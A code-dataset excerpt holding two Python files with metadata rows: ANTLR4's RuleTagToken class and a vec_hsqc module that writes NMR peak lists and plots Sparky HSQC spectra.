# can be found in the LICENSE.txt file in the project root.
#
#
# A {@link Token} object representing an entire subtree matched by a parser
# rule; e.g., {@code <expr>}. These tokens are created for {@link TagChunk}
# chunks where the tag corresponds to a parser rule.
#
from antlr4.Token import Token
class RuleTagToken(Token):
#
# Constructs a new instance of {@link RuleTagToken} with the specified rule
# name, bypass token type, and label.
#
# @param ruleName The name of the parser rule this rule tag matches.
# @param bypassTokenType The bypass token type assigned to the parser rule.
# @param label The label associated with the rule tag, or {@code null} if
# the rule tag is unlabeled.
#
# @exception IllegalArgumentException if {@code ruleName} is {@code null}
# or empty.
def __init__(self, ruleName, bypassTokenType, label=None):
if ruleName is None or len(ruleName)==0:
raise Exception("ruleName cannot be null or empty.")
self.source = None
self.type = bypassTokenType # token type of the token
self.channel = Token.DEFAULT_CHANNEL # The parser ignores everything not on DEFAULT_CHANNEL
self.start = -1 # optional; return -1 if not implemented.
self.stop = -1 # optional; return -1 if not implemented.
self.tokenIndex = -1 # from 0..n-1 of the token object in the input stream
self.line = 0 # line=1..n of the 1st character
self.column = -1 # beginning of the line at which it occurs, 0..n-1
self.label = label
self._text = self.getText() # text of the token.
self.ruleName = ruleName
def getText(self):
if self.label is None:
return "<" + self.ruleName + ">"
else:
return "<" + self.label + ":" + self.ruleName + ">"
|
mit
| 460,632,960,464,036,600
| 39.244898
| 99
| 0.653144
| false
| 3.90495
| false
| false
| false
|
kieranrimmer/vec_hsqc
|
vec_hsqc/post_proc.py
|
1
|
2620
|
from __future__ import division
import numpy as np
import os
import vec_hsqc
import nmrglue as ng
class DataOut( object ):
def __init__(self):
self.master_array = None
def generate_master_peak_list( self, y, legend_array, cs_array, legend_columns = [0,5], cs_columns = [0,1] ):
predind = np.nonzero( y == 1 )[0]
self.master_array = np.hstack( ( legend_array[ np.ix_( predind, legend_columns )], cs_array[ np.ix_( predind, cs_columns )] ) )
def writeall_peak_lists( self, master_array, savedir, filestump ):
for sp in np.unique( master_array[:,0] ):
specind = np.nonzero( master_array[:,0] == sp )[0]
sp_peaks = np.array( master_array[ np.ix_( specind ) ][:, 1:], dtype = float )
sp_peaks = sp_peaks[ sp_peaks[:,0].argsort() ]  # sorts by first column, i.e. residue number
self.peak_list_out( savedir, filestump, sp, sp_peaks )
def peak_list_out( self, savedir, filestump, sp_name, sp_peaks ):
basic_list = [ [ str(int(c[0])), round(c[1], 3), round(c[2], 4)] for c in [list(b) for b in sp_peaks ]]
plist_as_string = ''
for entry in basic_list:
plist_as_string += entry[0].rjust(4) + 'N-H\t' + str(entry[1]) + '\t' + str(entry[2]) + '\n'
with open( os.path.join( savedir, '%s_predicted_%s.list' %( filestump, sp_name ) ), 'wb' ) as f:
f.write( plist_as_string )
class SimpleViewAssigned( object ):
def readin_spectrum_sparky( self, spectrumpath ):
"""Reads and processes Sparky 2D spectrum using nmrglue
"""
self.dic, self.data = ng.sparky.read( spectrumpath )
self.avgheight = np.mean(self.data)
self.thresh_height = np.mean(np.abs(self.data))
udic = ng.sparky.guess_udic( self.dic, self.data )
x, y = np.shape( self.data )
self.uc0 = ng.sparky.make_uc( self.dic, self.data, dim=0)
self.uc1 = ng.sparky.make_uc( self.dic, self.data, dim=1)
self.w0limits = [ self.uc0.ppm(0), self.uc0.ppm( self.data.shape[0] ) ]
self.w1limits = [ self.uc1.ppm(0), self.uc1.ppm( self.data.shape[1] ) ]
# the below enables conversion of peak linewidths from datapoint units into Hz
self.pt_2_Hz0 = self.dic['w1']['spectral_width'] / (self.dic['w1']['npoints'] - 1 )
self.pt_2_Hz1 = self.dic['w2']['spectral_width'] / (self.dic['w2']['npoints'] - 1 )
self.w0size = self.dic['w1']['size']
self.w1size = self.dic['w2']['size']
def quick_view( self, peaklistpath, savedir, title ):
with open( peaklistpath, 'rb') as f:
peaklist = [b.strip().split() for b in f]
vec_hsqc.view_data.plot_2D_predictions_assigned( self.data, peaklist, self.thresh_height * 3.0, self, title, savedir )
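# --- Editor's usage sketch (not part of vec_hsqc): the intended flow, with
# all paths, array names and the spectrum title as assumptions.
#
#   do = DataOut()
#   do.generate_master_peak_list(y, legend_array, cs_array)
#   do.writeall_peak_lists(do.master_array, '/tmp/peaklists', 'myprotein')
#
#   viewer = SimpleViewAssigned()
#   viewer.readin_spectrum_sparky('/data/hsqc.ucsf')
#   viewer.quick_view('/tmp/peaklists/myprotein_predicted_1.0.list',
#                     '/tmp/plots', 'HSQC predictions')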
|
bsd-3-clause
| -1,594,254,006,062,670,600
| 33.025974
| 129
| 0.630534
| false
| 2.698249
| false
| false
| false
|